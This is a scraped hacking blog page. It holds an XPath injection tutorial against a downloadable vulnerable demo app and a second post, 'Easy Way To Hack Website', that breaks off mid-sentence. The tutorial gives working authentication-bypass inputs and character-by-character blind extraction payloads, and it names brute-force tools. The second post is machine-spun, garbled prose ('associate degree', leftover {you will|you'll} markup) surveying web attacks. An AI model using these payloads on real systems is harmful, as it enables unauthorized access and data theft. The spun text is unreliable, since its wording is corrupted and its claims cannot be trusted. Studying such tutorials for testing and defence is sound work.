Jual DVD game HD android dan Tutorial oprek android

Home All post with category Website Hacking

XPATH INJECTION TUTORIAL 2016

<div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhsRWP44xurU3lUBUqLzaQzLw86zDGhRq2B-2e9zJsasNQPVk9Q9XYavuJuAKr-YdpulXd4i1FBhSww8e5Tke3hyLZYiQpckBlB4MWOxIY6qE_90_0Y9QxD57es4ZwCW5VArnUWuhdT8ec/s1600/xpath_injection_ashtricks1.png" style="margin-left: auto; margin-right: auto;"><img alt="XPATH INJECTION TUTORIAL 2016" border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhsRWP44xurU3lUBUqLzaQzLw86zDGhRq2B-2e9zJsasNQPVk9Q9XYavuJuAKr-YdpulXd4i1FBhSww8e5Tke3hyLZYiQpckBlB4MWOxIY6qE_90_0Y9QxD57es4ZwCW5VArnUWuhdT8ec/s640/xpath_injection_ashtricks1.png" title="XPATH INJECTION TUTORIAL 2016" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">XPATH INJECTION TUTORIAL 2016</td></tr></tbody></table><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> We are gonna learn using the simple example. Download code from <a href="http://www.4shared.com/zip/SleYPtv8/xpath.html" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;">here</a> & put it in your local server directory.(Code is created by Amol Naik ) Sample XML Document which we gonna use:- <Employees>      <Employee ID="1">      <FirstName>Johnny</FirstName>      <LastName>Bravo</LastName>      <UserName>jbravo</UserName>      <Password>test123</Password>      <Type>Admin</Type>    </Employee>    <Employee ID="2">      <FirstName>Mark</FirstName>      <LastName>Brown</LastName>      <UserName>mbrown</UserName>      <Password>demopass</Password>      <Type>User</Type>    </Employee>    <Employee ID="3">      <FirstName>William</FirstName>      <LastName>Gates</LastName>      <UserName>wgates</UserName>      <Password>MSRocks!</Password>      <Type>User</Type>    </Employee>    <Employee ID="4">      <FirstName>Chris</FirstName>      <LastName>Dawes</LastName>      <UserName>cdawes</UserName>      <Password>letmein</Password>      <Type>User</Type>    </Employee>  </Employees>  </div><h3 style="background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-style: solid; border-radius: 0px 0px 6px 6px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; font-stretch: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;">Bypass Authentication:-</h3><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> Browse to the login.php page; here we can see the simple login form.</div> <div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf6g-fil6prW-sauScF_y-UAVOvDGjFicFOoNHOm0Pj653U5NJSd5QysclyA5x-MiqT0KSi0AfpOWS9AcDYCzMQ2QOonAqsemSVazMJtQ9ucGiQrkFtOXKDgNWHLllRV9mZM0Yihk4M1j/s1600/login.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Bypass Authentication" border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf6g-fil6prW-sauScF_y-UAVOvDGjFicFOoNHOm0Pj653U5NJSd5QysclyA5x-MiqT0KSi0AfpOWS9AcDYCzMQ2QOonAqsemSVazMJtQ9ucGiQrkFtOXKDgNWHLllRV9mZM0Yihk4M1j/s320/login.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Bypass Authentication" width="320" /></a></div> If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values: Username: ' or '1' = '1 Password:  ' or '1' = '1 <div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtU_DZoP-Al89zIVKpL34M7qI4ZmkO6GnuYysUh7N2ywRtnqNEUKX3pkjftCbFbTp0WqkDJ8QWRyki15f-Z90COR3voUPbp0lXY4Nmm-62uBKB6rZamU0YSyN9ucyTiQnk2e-kbCsGOn_N/s1600/Bypass-Login.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Bypass Authentication using XPATH injection" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtU_DZoP-Al89zIVKpL34M7qI4ZmkO6GnuYysUh7N2ywRtnqNEUKX3pkjftCbFbTp0WqkDJ8QWRyki15f-Z90COR3voUPbp0lXY4Nmm-62uBKB6rZamU0YSyN9ucyTiQnk2e-kbCsGOn_N/s320/Bypass-Login.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Bypass Authentication using XPATH injection" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"></div><a href="https://www.blogger.com/null" name="more" style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"></a>Looks quite familiar, doesn't it? Using these parameters, the query becomes: string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text()) As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided. <h3 style="background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-style: solid; border-radius: 0px 0px 6px 6px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; font-stretch: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;">Blind XPath Injection:-</h3><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure. Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiX85AvMvX5krT5Knq4hSPwhXMxvBfrSPs4mD45SmWnGJrYeN1OJiOTreXuyYMkxPUeBpHcYBe8XFdw3IkGuOVHAr__50F7ReqDi5oRdPbphTNrJEg__jC_CnfqggJhA36myDnCgxri4EY/s1600/search-first-name.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Blind XPATH Injection" border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiX85AvMvX5krT5Knq4hSPwhXMxvBfrSPs4mD45SmWnGJrYeN1OJiOTreXuyYMkxPUeBpHcYBe8XFdw3IkGuOVHAr__50F7ReqDi5oRdPbphTNrJEg__jC_CnfqggJhA36myDnCgxri4EY/s320/search-first-name.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Blind XPATH Injection" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmaPuXqUTqbyncHBDEH_NnCfMY1aa8xFBxI6coTMHu_GrlLckRimdXzUuot3l9G3nucQ1-7DPSq3YYnjPcMoe37NycXQsHPOUAW6keW6eePGivqaJYUJa-_JEAjcNlxJUI-osKlqJ9dDor/s1600/Bypass.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Blind XPATH Injection" border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmaPuXqUTqbyncHBDEH_NnCfMY1aa8xFBxI6coTMHu_GrlLckRimdXzUuot3l9G3nucQ1-7DPSq3YYnjPcMoe37NycXQsHPOUAW6keW6eePGivqaJYUJa-_JEAjcNlxJUI-osKlqJ9dDor/s320/Bypass.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Blind XPATH Injection" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">In blind XPath injection, we have to provide the specially crafted query to the application, if the query is true we will get result otherwise, we will not get any result.Till now We don`t know about any parent or child node of an XML document.</div><h3 style="background: rgb(251, 251, 239); border-bottom-color: rgb(1, 223, 1); border-bottom-style: solid; border-radius: 0px 0px 6px 6px; border-width: 0px 0px 4px; box-shadow: rgb(170, 170, 170) 1px 1px 2px; font-stretch: inherit; font-weight: 400; line-height: 1; margin: 6px 3px; outline: none medium; padding: 4px 10px; text-shadow: rgb(170, 170, 170) 1px 1px 1px; text-transform: capitalize; vertical-align: baseline; width: 598.5px;">Guessing Of Parent Node:-</h3><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> Supply the following query to application & observe the result. ' or substring(name(parent::*[position()=1]),1,1)='a Nothing append , we don`t get FirstName of users.<span style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">It means the first letter of the parent node is not "a". Now supply the following query ' or substring(name(parent::*[position()=1]),1,1)='E</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj657KlYHfM3nvC9N7Y_JVpq6bmoj8MYjLpFAc9OU5w1dkyBnKQNtD79v7g-13OWHT4SrdUroCZoEKonF1BaQSLsn7iMy4u8TnEF3WR3dkC4VWCMW_fWNDceohDFuQ4tXLS_4gD-icGgWLj/s1600/Blind-xpath.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Blind XPATH Injection" border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj657KlYHfM3nvC9N7Y_JVpq6bmoj8MYjLpFAc9OU5w1dkyBnKQNtD79v7g-13OWHT4SrdUroCZoEKonF1BaQSLsn7iMy4u8TnEF3WR3dkC4VWCMW_fWNDceohDFuQ4tXLS_4gD-icGgWLj/s320/Blind-xpath.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Blind XPATH Injection" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">You get result , <span style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">It means the first letter of parent node is "E"</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> To guess the second letter of parent node supply the following query ' or substring(name(parent::*[position()=1]),2,1)='m Following the same procedure, we can extract the full name of the parent node, which was found to be '<span style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">Employee'.</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> We can also get child node. Browse to the xpath.php page & enter the following query. //Employee[position()=3]/child::node()[position()=4]/text()</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9c4ff1xcgApAlYPHPG8QjGDykT29xnfcTfJ2u2r90ORjhL3s6emnvlZOQOs9yMBAyNFuVsNBnuR5GuvDSlqYUJrWz59H1OF4LxvLao9_s5KIHiGLWUhN_Jb4e3eriSIfCqN_EX49Ryf2u/s1600/Retriev+DATA.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="get-child-node" border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9c4ff1xcgApAlYPHPG8QjGDykT29xnfcTfJ2u2r90ORjhL3s6emnvlZOQOs9yMBAyNFuVsNBnuR5GuvDSlqYUJrWz59H1OF4LxvLao9_s5KIHiGLWUhN_Jb4e3eriSIfCqN_EX49Ryf2u/s320/Retriev+DATA.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="get-child-node" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">You got output from parent node Employee id 3 & child node whose position is 2.</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> To get the whole document put following query. //Employee</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><div class="separator" style="background-color: white; border: 0px; clear: both; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKCQqZUeaNel3psgFCetOROMU-no8pZx7_nl02-DzkRnhuNB7P72FxpqMwx8wamfBuTI3e5ziuGqthNtmxx1Tug-dqtmg6t6nxUwr0j9cQ6NKpUCBRcnE2l9R6zhfByv68M0WbeqtXgzPO/s1600/GET-DATA.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="Blind Xpath injection" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKCQqZUeaNel3psgFCetOROMU-no8pZx7_nl02-DzkRnhuNB7P72FxpqMwx8wamfBuTI3e5ziuGqthNtmxx1Tug-dqtmg6t6nxUwr0j9cQ6NKpUCBRcnE2l9R6zhfByv68M0WbeqtXgzPO/s320/GET-DATA.PNG" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="Blind Xpath injection" width="320" /></a></div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:</div><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;"> </div><ul style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; list-style: none outside none; margin: 10px 0px 10px 20px; outline: none medium; padding: 0px; vertical-align: baseline;"><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUAyhlbC5yCF-PN2I968EEzKN2CwPneb3gVOioBGCKJDjgwDmk7W0XBKQ_obAsNBAzlv4kuDPdamp8hBi4QFqF8Hxe5wfB9rajgPk6C3ZoLOGIIOJPk7IWtYc1vLKzxlF291pbYK7kIQXK/s24/w2b_bloggerbullet.png") left center no-repeat scroll transparent; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 7px 0px; outline: none medium; padding: 0px 0px 0px 30px; vertical-align: baseline;">count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUAyhlbC5yCF-PN2I968EEzKN2CwPneb3gVOioBGCKJDjgwDmk7W0XBKQ_obAsNBAzlv4kuDPdamp8hBi4QFqF8Hxe5wfB9rajgPk6C3ZoLOGIIOJPk7IWtYc1vLKzxlF291pbYK7kIQXK/s24/w2b_bloggerbullet.png") left center no-repeat scroll transparent; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 22px; list-style: none outside none; margin: 7px 0px; outline: none medium; padding: 0px 0px 0px 30px; vertical-align: baseline;"> string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.</li></ul><div style="background-color: white; border: 0px; font-stretch: inherit; line-height: 22.4px; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline;">I used recon-ng xpath brute forcer for XPath injection attack & we will get back end XML file. <div class="separator" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; clear: both; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhezgYCtc5G6lbuamZqGU-P9ix_SZbxWZEIIdjeT2MBmBTUrqMsaj7Hex4CFZAM3AHOP5YrRkdnUpa5IWq20ejusDaBkd3Nii9AEFuL3njlyaYtU9EoH8qWPOOR-OYTzHitmb16LJXap-Ov/s1600/Screenshot.png" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 1em; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="xapth-bruteforcer" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhezgYCtc5G6lbuamZqGU-P9ix_SZbxWZEIIdjeT2MBmBTUrqMsaj7Hex4CFZAM3AHOP5YrRkdnUpa5IWq20ejusDaBkd3Nii9AEFuL3njlyaYtU9EoH8qWPOOR-OYTzHitmb16LJXap-Ov/s320/Screenshot.png" style="border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; outline: none medium; padding: 1px; vertical-align: baseline; width: auto;" title="xapth-bruteforcer" width="320" /></a></div> Useful Links & Blind XPATH injection Tools:- <a href="https://www.owasp.org/index.php/XPATH_Injection" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;">https://www.owasp.org/index.php/XPATH_Injection</a> <a href="http://www.blogger.com/goog_913170007" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;"> </a><a href="https://www.owasp.org/index.php/Blind_XPath_Injection" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;">https://www.owasp.org/index.php/Blind_XPath_Injection</a> XPATH BLIND EXPLORER:-  <a href="http://code.google.com/p/xpath-blind-explorer/downloads/list" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;">http://code.google.com/p/xpath-blind-explorer/downloads/list</a> XCAT:-  <a href="https://github.com/orf/xcat" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none medium; padding: 0px; text-decoration: none; vertical-align: baseline;">https://github.com/orf/xcat</a></div>

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attack...

View Post

Easy Way To Hack Website in 2016

No comments:

As per as I do know regarding hackers mind owing to my moral expertise. these days progressing to share with you all regarding the ways of website hacking. Hackers use totally different ways to focus on an internet site or a server to either steal sensitive info or use the server resources to spam or do different malicious activities. Of course, the consequences of such associate degree attack may be devastating, and also, the worst half is after they use your server resources to perform totally different <span class="qtiperar" id="tip_25" style="cursor: pointer; font-family: "arial" , "helvetica" , sans-serif; font-size: 15px;" title="illegal|illegal |amerciable|banned|prohibited|bootleg|black|black-market|contraband|smuggled|criminal|felonious|dirty|ill-gotten|embezzled|misappropriated|extrajudicial|extralegal|nonlegal|hot|illegitimate|illicit|outlaw|outlawed|unlawful|ineligible|misbr">outlawed activities. <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdBIXB7WcyUPMhSFsWFCfHiZ98LO6E0jyYQXBlUKAmVUwntk7TRdKMoM9S0qe60uf5Od8TwiOOlRWdvWZNa1cOLWunnetN_hSdSc-pYuwtCUFTNO5beXwF3PEjL_gBj8paSiiZDWn9vQ8/s1600/result.jpg" style="margin-left: auto; margin-right: auto;"><img alt="Easy Way To Hack Website in 2016 " border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdBIXB7WcyUPMhSFsWFCfHiZ98LO6E0jyYQXBlUKAmVUwntk7TRdKMoM9S0qe60uf5Od8TwiOOlRWdvWZNa1cOLWunnetN_hSdSc-pYuwtCUFTNO5beXwF3PEjL_gBj8paSiiZDWn9vQ8/s400/result.jpg" title="Easy-Way-To-Hack-Website-in-2016 " width="400" /></a></td></tr><tr><td class="tr-caption" style="font-size: 12.8px;">Easy Way To Hack Website in 2016 </td></tr></tbody></table> <div class="separator" style="clear: both; text-align: center;"> </div> In this article, I will be able to list the highest half-dozen website security problems that you just ought to bear in mind of. <strong style="background-color: white; border: 0px none; color: #222222; font-family: verdana, sans-serif; font-size: 18.6667px; line-height: 22px; list-style: none; margin: 0px; outline: none; padding: 0px;">#1. Code Injection Web sites that lack some kind of kind validation area unit liable to code injection. this happens once a code is injected into a malicious program or an internet application with the intention of adjusting the course of execution, to realize access to associate degree organization’s resources. These sorts of code injections may be fatal. they'll vary from completely destroying an internet site to stealing valuable user info. In 2013, hackers managed to steal over $100,000 from associate degree ISP that's based mostly inAmerican state.so staying safe from code injection may be a should. to shield your web site from this sort of attack, you wish to forestall any untrusted input like invalid characters from <span class="qtiperar" id="tip_65" style="cursor: pointer; font-family: "arial" , "helvetica" , sans-serif; font-size: 15px;" title="getting to|going to|progressing to|attending to|reaching to|planning to|aiming to|about to">planning to your SQL info. #2. SQL Injection  SQL injection may be a code injection technique that's want to manipulate a website’s information.this way of attack is employed by hackers to focus on dynamic CMS information bases likeWordPress to steal data and different valuable info. SQL injection is additionally the foremost common form of application layer attack techniques that used nowadays. this sort of attack affects net applications that ar improperly coded and permits the hacker to inject SQL commands into any login type, that permits them a straightforward access to the information that's command at intervals your information. #3. Cross Site Scripting (XSS) XSS may be a form of security vulnerability that's found in net applications, within which a hacker injects a client-side script into trustworthy web pages or URLs that permits them to steal sensitive user information or the other information. XSS may also enable Associate in Nursing offender to control an internet page and shows it as if it’s a login screen to the guests. Associate in a Nursing example of this attack was discovered to have an effect on WordPress four.2 comments, that enabled the attackers to compromise a website mistreatment the comments. <h2 style="text-align: center;">Easy Way To Hack Website in 2016 </h2> To check for XSS vulnerability, you'll use an internet Vulnerability Scanner. net Vulnerability Scanner scans your website and checks whether or not it’s XSS vulnerable or not. it'll tell you which of themURLs or scripts ar prone to these attacks in order that you'll fix it. WVS will check for any SQL injections or the other net vulnerability. <strong style="background-color: white; border: 0px none; color: #222222; font-family: verdana, sans-serif; font-size: 18.6667px; line-height: 22px; list-style: none; margin: 0px; outline: none; padding: 0px;">#4. Brute-force attack Brute-force attacks work by shot your username and word till it finds the proper combination. Weak passwords will simply be guessed by this attack, that’s why it’s powerfully suggested to use strong/hard to guess passwords. To protect yourself from this attack is easy; {you will|you'll|you'll be able to} merely block information science addresses that area unit taking an excessive amount of server resources otherwise you can use multi-factor authentication, and don’t forget to use sturdy passwords. #5. Denial of Service Attack (DoS) The most infamous types of an attacks area unit the DoS attacks. just because any hacker will bombard the victims website with <span class="qtiperar" id="tip_22" style="cursor: pointer;" title="millions of|many|a lot of|lots of|numerous|countless|several|scores of|innumerable|uncountable|immeasurable|ample|countless|legion|several|variant|various|voluminous">innumerable requests, that causes the server to crash. DoS attacks don't seem to be hacking attacks, however, they're merely accustomed take down an internet site. This, after all, makes the website go offline and it needs manual intervention from the webmaster to bring it back on-line. Moreover, AN assailant can even send you spam email messages to attack your email account. Since your email account is equipped for a free service like Outlook, you're given a restricted quota, that limits your account to a definite quantity of knowledge that you simply will send. By spamming your email messages, AN assailant will consume your entire quota, preventing you from receiving from now on messages. Imagine you open your email account someday and you see thousands of spam messages. #6. Unencrypted Protocols Any protocol that's unencrypted will enable AN assailant to steal valuable info from your users. Thus, it’s continually most well-liked and suggested to use the quality security encoding technology known as “Secure Sockets Layer” or SSL for the brief, whenever there’s personal info being changed between your website and also the information. SSL works by providing a secure channel between 2 machines that's operative over the net or an inside network. This protocol is employed once a browser must connect with an internet server firmly over the net while not the spying eyes of the hackers. <div style="background-color: white; border: 0px none; color: #222222; font-family: lato, serif; font-size: small; line-height: 22px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">#How to protect your website</div>If you're employing a Content Management System (CMS) like Joomla or WordPress, then buy their blogs, scan their latest articles and continually keep your CMS up to this point. Keep all of your third party plugins up to this point. Remember, any forms that modify users to transfer something can 